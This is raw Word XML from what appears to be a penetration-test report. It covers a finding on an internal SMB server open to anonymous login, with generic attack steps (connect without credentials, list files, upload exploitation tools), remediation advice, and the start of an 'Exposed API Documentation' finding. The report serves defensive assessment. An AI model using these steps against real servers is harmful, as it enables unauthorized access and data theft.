        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">connect and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view any internal files </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="756AEC6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>without needing to provide valid credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2B80FF02" w14:textId="09198D3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1540C5A" w:rsidP="0D325B6E" w:rsidRDefault="01540C5A" w14:paraId="3EE69D23" w14:textId="08153DF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1540C5A" w:rsidP="0D325B6E" w:rsidRDefault="01540C5A" w14:paraId="2C1DD291" w14:textId="08D2EE7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If the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6997316C">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6997316C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nternal</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6997316C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB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server is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utilized</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to ser</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ve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sensitive files and data, attackers are easily able </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_7ScIOFDJ" w:id="800521079"/>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to anonymously</w:t>
      </w:r>
      <w:bookmarkEnd w:id="800521079"/>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log in and view the data on the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73293E70">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMB</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server. Attackers can also abuse the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4D8049E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>internal SMB</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server to get exploitation tools into the internal network and exfiltrate sensitive data out of the internal </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="263E266A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>environment,</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which is harder to detect and prevent than other infiltration/exfiltration methods. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0157FCA3" w14:textId="3AA30495">
      <w:pPr>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01540C5A" w:rsidP="0D325B6E" w:rsidRDefault="01540C5A" w14:paraId="1C00222F" w14:textId="7A4939C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1540C5A" w:rsidP="0D325B6E" w:rsidRDefault="01540C5A" w14:paraId="4CE77BCF" w14:textId="1C990D3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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="161316B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMB</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server with </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2AC6DA84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">no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username and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="49B6B622">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no</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password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="01540C5A" w:rsidP="0D325B6E" w:rsidRDefault="01540C5A" w14:paraId="44B1F37A" w14:textId="782FB8D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Step 2: Use the ls command to view data and files stored on the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="16B652EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB </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server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="01540C5A" w:rsidP="0D325B6E" w:rsidRDefault="01540C5A" w14:paraId="5B94238B" w14:textId="7F393E6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Step 3: U</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se put to transfer exploitation tools and scripts into the internal network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="477D4B70" w14:textId="1EA44AC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01540C5A" w:rsidP="0D325B6E" w:rsidRDefault="01540C5A" w14:paraId="66412D38" w14:textId="2FE0281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01540C5A" w:rsidP="0D325B6E" w:rsidRDefault="01540C5A" w14:paraId="6690ABD0" w14:textId="611D596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093B8A10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="31A8DEA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e following</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="01540C5A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6295EF4D" w:rsidP="0D325B6E" w:rsidRDefault="6295EF4D" w14:paraId="6C044CB2" w14:textId="2545D410">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Disable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Guest SMB authenticat</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ion via the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Group Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6295EF4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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to enable enforcement for the entire domain. Navigate to ‘Computer Configuration\Administrative Templates\Network\Lanman Workstation’ and set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Enable insecure guest logons</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Disabled</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6295EF4D" w:rsidP="0D325B6E" w:rsidRDefault="6295EF4D" w14:paraId="019E94B6" w14:textId="2C8A19B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>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Ensure t</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hat a</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ll</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 sha</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r</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es are conf</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igured with explicit permissions that </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="254E085E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allow</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 access </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on the basis of</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7AC173E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the principle</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6295EF4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of least privilege, allowing only authorized users and groups to connect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="79F7858B" w14:textId="31EA2A01">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>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01540C5A" w:rsidP="0D325B6E" w:rsidRDefault="01540C5A" w14:paraId="7CBA19DA" w14:textId="22B7348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01540C5A">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E0AD29C" w:rsidP="0D325B6E" w:rsidRDefault="4E0AD29C" w14:paraId="751949AB" w14:textId="64FF916B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="smb-insecure-guest-authentication" r:id="R9de6a37a687844ce">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4E0AD29C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Microsoft - SMB security hardening</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="4E0AD29C" w:rsidP="0D325B6E" w:rsidRDefault="4E0AD29C" w14:paraId="25D005CA" w14:textId="384E3A01">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R029fd7a5d3104131">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4E0AD29C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Absolute - Disable Guest Logons</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="04354721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="388019C6" w14:textId="45DCCF39">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F80FFB7" w:rsidP="0D325B6E" w:rsidRDefault="5F80FFB7" w14:paraId="0C218F3C" w14:textId="3CC90597">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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437238412" w:id="876262579"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5F80FFB7">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80" w:themeShade="FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5F80FFB7">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1883090448" w:id="152558354"/>
      <w:bookmarkStart w:name="_Toc1307500417" w:id="1115634761"/>
      <w:bookmarkStart w:name="_Toc1847389072" w:id="1793398326"/>
      <w:bookmarkStart w:name="_Toc1010028520" w:id="413126675"/>
      <w:bookmarkStart w:name="_Toc1486498894" w:id="336295101"/>
      <w:bookmarkStart w:name="_Toc1505909758" w:id="600639170"/>
      <w:bookmarkStart w:name="_Toc262775794" w:id="476624978"/>
      <w:bookmarkStart w:name="_Toc1693783326" w:id="370740936"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="35924CB5">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exposed API Documentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152558354"/>
      <w:bookmarkEnd w:id="1115634761"/>
      <w:bookmarkEnd w:id="1793398326"/>
      <w:bookmarkEnd w:id="413126675"/>
      <w:bookmarkEnd w:id="336295101"/>
      <w:bookmarkEnd w:id="600639170"/>
      <w:bookmarkEnd w:id="476624978"/>
      <w:bookmarkEnd w:id="370740936"/>
      <w:bookmarkEnd w:id="876262579"/>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033A30B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2203210" w:rsidP="0D325B6E" w:rsidRDefault="32203210" w14:paraId="0ED5426B" w14:textId="77D558C3">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="32203210">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">M0800 </w:t>
            </w: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09B7D68" w14:textId="46ECB58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2E63CF9" w14:textId="7C3BCF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1B1479E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F1AB859" w14:textId="4CB7025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6E62848B" w14:textId="5D0FF16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758FE85" w14:textId="362EE437">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5703CE2E" w14:textId="020A5F73">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2BDCCDB8">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C8D582" w14:textId="28DB276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50C1D4F0" w14:textId="0107715B">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49A05577"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67EB7617"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3E5A03B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CCC4241" w14:textId="315272D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F9DFB42" w14:textId="17890A2B">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4946BCE4">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EBFB1B" w14:textId="090109F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3E9C4F0" w:rsidP="0D325B6E" w:rsidRDefault="23E9C4F0" w14:paraId="7B0870DC" w14:textId="554AE3F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23E9C4F0">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3DC00F0" w:rsidP="0D325B6E" w:rsidRDefault="43DC00F0" w14:paraId="0D678C08" w14:textId="645BE532">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R516017143e014811">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="43DC00F0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>TA0043</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="22DF111A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve">: </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="43DC00F0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>Reconnaissance</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5CABE471">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E703EFA"/>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3E9C4F0" w:rsidP="0D325B6E" w:rsidRDefault="23E9C4F0" w14:paraId="21A057B2" w14:textId="580B172C">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23E9C4F0">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5A2DB1E" w:rsidP="0D325B6E" w:rsidRDefault="05A2DB1E" w14:paraId="418B7979" w14:textId="386E13E2">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Re698639d33714171">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="05A2DB1E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>M0801</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="70F9911F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="05A2DB1E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve"> Access Management</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="25CC9B0B" w:rsidP="0D325B6E" w:rsidRDefault="25CC9B0B" w14:paraId="32325B87" w14:textId="6EDF6920">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R857cf3ea61ca4fa9">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="25CC9B0B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>M0800</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="42908FF4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="25CC9B0B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve"> Authorization Enforcement</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
